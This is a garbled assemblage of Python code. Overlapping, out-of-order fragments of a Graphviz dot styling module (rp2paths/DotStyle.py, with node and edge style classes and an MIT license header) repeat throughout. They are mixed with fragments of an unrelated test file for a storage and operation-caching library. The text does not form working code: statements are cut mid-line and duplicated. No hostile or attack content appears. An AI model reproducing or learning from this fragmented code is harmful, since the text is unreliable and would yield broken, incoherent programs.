\"\"\" class NodeStyle(object): \"\"\"General class", "key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key,", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2'", "'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\"", "self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\"", "'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction", "setting the appearance of a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class", "for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color':", "'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def", "for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color':", "by the MIT license that can be found in the LICENSE.txt file. \"\"\"", "\"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style", "chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green',", "\"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style =", "GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return self.style class", "}) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class", "of a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA", "is governed by the MIT license that can be found in the LICENSE.txt", "return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs):", "super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' })", "Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize':", "value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key, value", "\"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs: self.style.extend(key, value) def GetStyle(self):", "key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis", "'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self,", "group, INRA Use of this source code is governed by the MIT license", "file. 
Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use of this", "for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style", "governed by the MIT license that can be found in the LICENSE.txt file.", "class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style =", "'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth': '2', 'arrowsize': '2' }", "<NAME>, JL Faulon's research group, INRA Use of this source code is governed", "\"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for", "of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\"", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth':", "'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target compound", "\"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for", "edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2',", "'2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\"", "attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self,", "value) def GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return", "node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in", "class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key,", "for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle',", "'0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs):", "MIT license that can be found in the LICENSE.txt file. \"\"\" class NodeStyle(object):", "\"\"\"Class for setting the appearance of a dot file. Copyright (C) 2016-2017 <NAME>,", "an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape':", "research group, INRA Use of this source code is governed by the MIT", "JL Faulon's research group, INRA Use of this source code is governed by", "the MIT license that can be found in the LICENSE.txt file. 
\"\"\" class", "of key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a", "class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style =", "class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize':", "a dictionnary of key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize':", "style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs:", "} class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a", "class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth':", "edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in", "\"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style", "EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict()", "<filename>rp2paths/DotStyle.py \"\"\"Class for setting the appearance of a dot file. 
Copyright (C) 2016-2017", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0'", "for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value", "super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle):", "class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\"", "in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key, value of", "} class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound", "'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def", "self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style", "target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle',", "for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value", "'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target", "dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use of", "'24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "the appearance of a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research", "code is governed by the MIT license that can be found in the", "\"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle):", "of this source code is governed by the MIT license that can be", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth':", "} class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs):", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18',", "= { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for", "node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red',", "the LICENSE.txt file. 
\"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self,", "Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style =", "'1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "(C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use of this source code", "be found in the LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class for node", "'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1'", "self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class", "class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key,", "production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth':", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth': '2', 'arrowsize': '2'", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' }", "a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red',", "a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' } class", "Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style =", "**kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs: self.style.extend(key, value) def", "a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval',", "in the LICENSE.txt file. 
\"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def", "'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\"", "\"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "def GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return self.style", "'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self,", "'18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self,", "} class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style", "super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' }", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize':", "{ 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a", "2016-2017 <NAME>, JL Faulon's research group, INRA Use of this source code is", "\"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape':", "'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an", "\"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style =", "{ 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a", "class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class", "self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18',", "Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use of this source", "NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict()", "compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize':", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs: self.style.extend(key,", "value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound", "node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18',", "= { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge", "\"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "source code is governed by the MIT license that can be found in", "Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" 
super().__init__(**kwargs) self.style =", "dict() for key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary", "'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs):", "{ 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style", "{ 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\"" ]
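# ---------------------------------------------------------------------------
# Usage sketch (added for illustration; `render_attrs` is a hypothetical
# helper, not part of the module above). GetStyle() returns a plain dict of
# .dot attributes, so a node or edge attribute list can be produced by
# joining its items.

def render_attrs(style):
    """Join a style dict into a dot attribute list, e.g. '[color=red, penwidth=2]'."""
    return '[' + ', '.join('{}={}'.format(key, value)
                           for key, value in style.items()) + ']'

# Production().GetStyle()              -> {'color': 'red', 'penwidth': '2', 'arrowsize': '2'}
# render_attrs(Production().GetStyle()) -> '[color=red, penwidth=2, arrowsize=2]'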
[ "not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage", "from .utils import * from .funcs import * from .conftest import setup_tests def", "= Storage() @op(storage) def inc(x:int) -> int: return x + 1 @op(storage) def", "return [inc(x) for x in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums)", "= Any(), Any() z = add(x, y) df = c.qeval(x, y, z, names=['x',", "= [inc(x) for x in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert", "things = [] means = [] for i in range(10): thing = inc(i)", "== 0 def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return", "isolation of commits between partitions with run(storage, autocommit=False, partition='first') as c: for i", "as c: x = add(23, 42) c.commit() with query(storage=storage) as c: x, y", "############################################################################ with run(storage) as c: nums = range(10) incs = [inc(x) for x", "autodelete=False) as c: nums = range(10) incs = [inc(x) for x in nums]", "autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage()", "############################################################################ # run a workflow of several parts with run(storage=storage) as c: nums", "[inc(x) for x in nums] with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions()", "### check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert", "y) df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt", "x in range(1, num) if num % x == 0] @superop(storage) def f(lst:TList[int])", "storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things", "lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests", "\"\"\" Tests for deleting operations are isolated to prevent schema changes across tests", "-> TList[int]: divisors_list = [get_divisors(num) for num in nums] return [elt for divs", "mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc", "c: nums = range(10) incs = [inc(x) for x in nums] final =", "= mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a", "divisors_list = [get_divisors(num) for num in nums] return [elt for divs in divisors_list", "i in range(10): inc(i) c.commit() with run(storage, autocommit=False) as c: for i in", "deleting multiple calls at once ############################################################################ with run(storage=storage) as c: things = []", "c: x, y = Any(), Any() z = add(x, y) df = c.qeval(x,", "############################################################################ ### deleting multiple calls at once 
############################################################################ with run(storage=storage) as c: things", "j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions()", "def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit with run(storage, autocommit=False): for", "nums = range(10) incs = [inc(x) for x in nums] final = mean(x=incs)", "= mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions() for func in (inc, add, mean):", "= mean(means) c.commit_deletions() for func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True)", "num) if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list", "deleting calls only, verifying vrefs remain orphaned ############################################################################ with run(storage) as c: nums", "delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting operations are", "multiple calls at once ############################################################################ with run(storage=storage) as c: things = [] means", "range(10): inc(i) c.commit() with run(storage, autocommit=False) as c: for i in range(10, 20):", "orphaned ############################################################################ with run(storage) as c: nums = range(10) incs = [inc(x) for", "storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False) as c: for i in", "x + 1 @op(storage) def add(x:int, y:int) -> int: return x + y", "[elt for divs in divisors_list for elt in divs] @op(storage) def inc(x:int) ->", "def test_drop_op(): \"\"\" Tests for deleting operations are isolated to prevent schema changes", "@superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num in nums] return", "TList[int]: divisors_list = [get_divisors(num) for num in nums] return [elt for divs in", "return x + y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0')", "return [elt for divs in divisors_list for elt in divs] @op(storage) def inc(x:int)", "+ 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x in chunk]", "mean(x=incs) d.commit_deletions() # check it got deleted but earlier things didn't df =", "def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for", "things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ###", "things.append(thing) for j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final =", "= [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert", "== 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs remain orphaned", "= add(23, 42) c.commit() ### delete the work with delete(storage=storage) as c: x", "run(storage, autocommit=False) as c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False)", "+ 1 @op(storage) def add(x:int, y:int) -> int: return x + y ###", "c.commit() with 
run(storage, autocommit=False) as c: for i in range(10, 20): inc(i) assert", "with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug():", "x in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True):", "run(storage, autocommit=True): for i in range(10): inc(i) ### drop op with results storage.drop_func(f=inc)", "only ############################################################################ # run a workflow of several parts with run(storage=storage) as c:", "### unit ############################################################################ ### do some work with run(storage=storage) as c: x =", "list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage() @op(storage) def", "storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ### do computation again with run(storage=storage)", "= storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some", "with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage,", "def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do", "with run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert", "for func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert", "############################################################################ ### do some work with run(storage=storage) as c: x = add(23, 42)", "for x in nums] with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() #", "for elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple", "### do computation again with run(storage=storage) as c: x = add(23, 42) c.commit()", "for deleting operations are isolated to prevent schema changes across tests \"\"\" storage", "run(storage=storage) as c: x = add(23, 42) c.commit() ### delete the work with", "test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do some", "### test isolation of commits between partitions with run(storage, autocommit=False, partition='first') as c:", "storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation of commits between partitions", "with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20))", "= get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty", "= 
storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ### do computation again with", "assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ###", "-> int: return lst[0] with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with run(storage):", "list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0", "= c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)}", "c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() # check it got deleted but", "assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################ # run", "-> int: return x + y ### drop empty op storage.drop_func(f=add) assert not", "final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with", "incs = [inc(x) for x in nums] final = mean(x=incs) c.commit() # delete", "storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x", "def add(x:int, y:int) -> int: return x + y ### drop empty op", "20): inc(i) with run(storage, autocommit=False, partition='third') as c: for i in range(20, 30):", "z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int)", "autocommit=True): for i in range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert", "storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ###", "= range(10) incs = [inc(x) for x in nums] final = mean(x=incs) c.commit()", "not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################ # run a", "for x in nums] final = mean(x=incs) c.commit() # delete only latter part", "add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################", "names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42, 65)}", "run(storage, autocommit=False, partition='third') as c: for i in range(20, 30): inc(i) c.commit() assert", "lst = get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert", "with run(storage, autocommit=True): for i in range(10): inc(i) ### drop op with results", "df.empty assert not storage.call_st.locs() ### do computation again with run(storage=storage) as c: x", 
